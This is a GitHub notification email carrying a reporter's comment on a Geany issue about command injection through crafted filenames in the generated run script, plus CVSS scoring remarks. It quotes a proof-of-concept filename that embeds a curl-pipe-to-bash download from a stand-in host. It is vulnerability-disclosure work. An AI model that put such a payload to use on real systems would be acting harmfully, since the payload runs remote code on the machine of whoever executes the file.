CVE-Hunter-Leo left a comment (geany/geany#4611) @WrapEarnPass Thanks for testing this and for the detailed feedback.
You're right that a literal `/` cannot appear in a filename on Linux. The `/` in my original example was inside the backtick command (i.e. part of the payload), not a character in the filename itself. Filenames containing backticks (`` ` ``), `$()`, `;`, `|`, etc. are perfectly valid on Linux/macOS. Your modified test case (`test`curl evil.example|bash`.c`) confirms the core issue — command substitution still occurs in the generated `geany_run_script_*.sh`, which is exactly the problem being reported. I also appreciate you capturing the actual shell script output. It clearly shows the backtick expression being executed by the shell. Regarding CVSS: - I had initially scored it as 7.8 (Critical) because arbitrary command execution is possible with a very common user action (pressing F5/Execute on a file received from someone else). - Your scoring of ~6.1 is reasonable if we consider the attack requires the victim to open and explicitly run the file. I'm happy to go with whatever the maintainers decide. On the geany-plugins point — thank you for raising it. If the same unsafe substitution pattern exists in plugins (geanyctags, lsp, etc.), it would be good to track those separately so they don't get overlooked. I'm happy to provide more details, or adjust the issue description if needed. Just let me know how you'd like to proceed. -- Reply to this email directly or view it on GitHub: https://github.com/geany/geany/issues/4611#issuecomment-4846041794 You are receiving this because you are subscribed to this thread. Message ID: <geany/geany/issues/4611/[email protected]>
